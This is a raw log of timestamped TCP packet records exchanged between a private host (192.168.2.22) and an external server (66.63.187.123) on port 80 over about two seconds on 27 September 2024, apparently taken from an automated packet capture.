                                                                                                            Sep 27, 2024 16:00:36.098920107 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.098954916 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.098968983 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.098977089 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099000931 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099008083 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099044085 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099054098 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099073887 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099087000 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099090099 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099100113 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099123001 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099132061 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099369049 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099407911 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099431038 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099442959 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099463940 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099472046 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099554062 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099565029 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099591970 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099606037 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099617958 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099639893 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099653006 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099803925 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099823952 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099834919 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.099844933 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099853992 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099870920 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.099998951 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100008965 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100038052 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100378036 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100418091 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100426912 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100436926 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100460052 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100467920 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100538969 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100552082 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100563049 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100579023 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100588083 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100693941 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100713015 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100722075 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100735903 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100743055 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100850105 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100861073 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100871086 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.100883961 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100892067 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.100908041 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142206907 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142257929 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142270088 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142323971 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142323971 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142421007 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142432928 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142442942 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142453909 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142458916 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142486095 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142604113 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142613888 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142620087 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142630100 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142649889 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142661095 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142785072 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142817974 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142846107 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142855883 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142867088 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142877102 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.142888069 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142888069 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.142901897 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143013000 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143048048 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143136024 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143146992 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143170118 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143179893 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143191099 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143222094 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143291950 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143301964 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143312931 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143322945 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143328905 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143354893 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143372059 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143526077 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143534899 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143544912 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143554926 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143559933 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143563986 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143572092 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143573999 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143588066 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143600941 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143783092 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143795013 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143805027 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143819094 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143834114 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.143969059 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143979073 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.143990040 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144000053 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144004107 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144010067 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144015074 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144021034 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144028902 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144032001 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144042015 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144042015 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144052982 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144057989 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144071102 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144084930 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144387960 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144399881 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144412041 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144423962 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144437075 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144529104 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144541025 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144556999 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144558907 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144567966 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144575119 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144582033 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.144587040 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144599915 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.144613028 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.147700071 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.147732019 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.147742033 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.147768021 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.147789955 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.147855043 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.147888899 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.147913933 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.147945881 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.153462887 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.526083946 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:36.531279087 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.749515057 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:36.749686003 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.125608921 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.130580902 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.131035089 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.131294966 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.136142015 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892034054 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892106056 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.892139912 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892151117 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892163038 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892174006 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892191887 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.892215014 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892215014 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.892225981 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892260075 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.892281055 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.892329931 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892378092 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.892411947 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892422915 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.892466068 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.897109032 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.897134066 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.897205114 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.897226095 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.897527933 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.897578955 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:37.897583008 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:37.897625923 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.035530090 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.035557985 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.035567999 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.035597086 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.035653114 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.035723925 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.035756111 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.035761118 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.035772085 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.035797119 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.036453009 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.036485910 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.036513090 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.036523104 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.036540985 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.036555052 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.036637068 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.036678076 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.036711931 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.036721945 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.036748886 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037038088 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037071943 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037106037 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037117958 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037139893 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037152052 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037233114 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037265062 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037645102 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037671089 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037681103 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037704945 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037789106 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037822962 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037856102 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037869930 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.037883043 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.037924051 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.038186073 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.038227081 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.038266897 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.038280010 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.038301945 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.038316011 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.040438890 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.040481091 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.040488958 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.040522099 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.040572882 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.040607929 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.040651083 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.040662050 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.040693998 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.179951906 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.179975033 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.179986000 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180042982 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180078983 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180094004 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180134058 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180144072 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180144072 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180170059 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180269003 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180315971 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180347919 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180360079 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180388927 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180474997 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180526018 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180558920 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180588961 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180596113 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180622101 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180639982 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180650949 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180661917 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180677891 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180694103 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180860043 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180871964 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180882931 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.180905104 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.180917978 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181055069 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181066036 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181092024 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181104898 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181219101 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181230068 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181241035 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181256056 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181268930 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181344032 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181354046 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181385040 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181493044 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181503057 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181531906 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181540012 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181543112 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181555033 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181576967 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181591988 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181715012 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181725979 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181750059 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181785107 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181808949 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181819916 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181844950 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181858063 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181946039 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181957006 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.181981087 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.181993008 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.182080030 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.182090998 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.182115078 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.182127953 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.182423115 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.182461977 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.182492018 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.182502031 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.182526112 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.182538033 CEST4916680192.168.2.2266.63.187.123
